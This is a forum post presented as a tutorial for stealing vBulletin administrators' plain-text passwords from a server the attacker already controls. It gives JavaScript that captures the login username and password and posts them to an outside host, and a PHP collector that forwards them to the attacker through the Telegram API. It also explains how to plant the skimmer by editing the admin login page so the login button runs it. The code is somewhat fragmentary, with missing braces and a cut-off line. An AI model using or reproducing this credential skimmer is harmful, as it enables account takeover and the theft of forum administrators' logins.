Jump to content

[vBulletin] How to steal vBulletin admins password


Recommended Posts

This tutorial is for education purposes only.


if you ever had the access to a server hosting a vBulletin forum, you would probably be able to access the admin panel by grabbing the database password from the config files, then change the admin encrypted password by your encrypted password from the database to access the admin panel, but probably you’ll be out the server pretty soon.

but there’s a better solution which’s getting the admin plain text password, by a phishing attack or stealing his password using JavaScript, which I’ll be cover in this topic.

we could use PHP and get the password after the post request but vBulletin encrypts the password with MD5 using JavaScript in the Client Side, so we’ll try to grab the password before it gets encrypted.

the script I’ll be using is:

function mal()
	var xhr = new XMLHttpRequest();
	xhr.open("POST", "http://example/admindata.php", true);
	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
	xhr.send("Data="+document.getElementById("vb_login_username").value + " " + document.getElementById("vb_login_password").value);

the given script grabs the password and sends it to a PHP script which then writes it to a file or sends it to you using telegram or with email, an example using telegram API:


if ($_SERVER['REQUEST_METHOD'] == "POST" && isset($_POST['Data']))
$token = "YOUR_TOKEN";
chat_id=YOUR_CHAT_ID&text=" . urlencode($_POST['Data'])."" );
    header("Location: https://google.com");

so now you can upload the PHP script on the same server or your server, or you can send the passwords directly from the JavaScript.

now we’ll have to edit the index page and add our JavaScript script to it and edit somethings to get everything done.

the index page is located in: ./core/includes/adminfunctions.php

add the javascript script inside a tag, and edit this line :

<input type="submit" class="button" value="  <?php echo 
$vbphrase['log_in']; ?>  " accesskey="s" tabindex="3" /> 


<input type="submit" onclick="mal()" class="button" value="  <?php echo 
$vbphrase['log_in']; ?>  " accesskey="s" tabindex="3" />

and now wait for admins passwords, that’s it, peace out!

Link to comment
Share on other sites

  • 2 months later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Create New...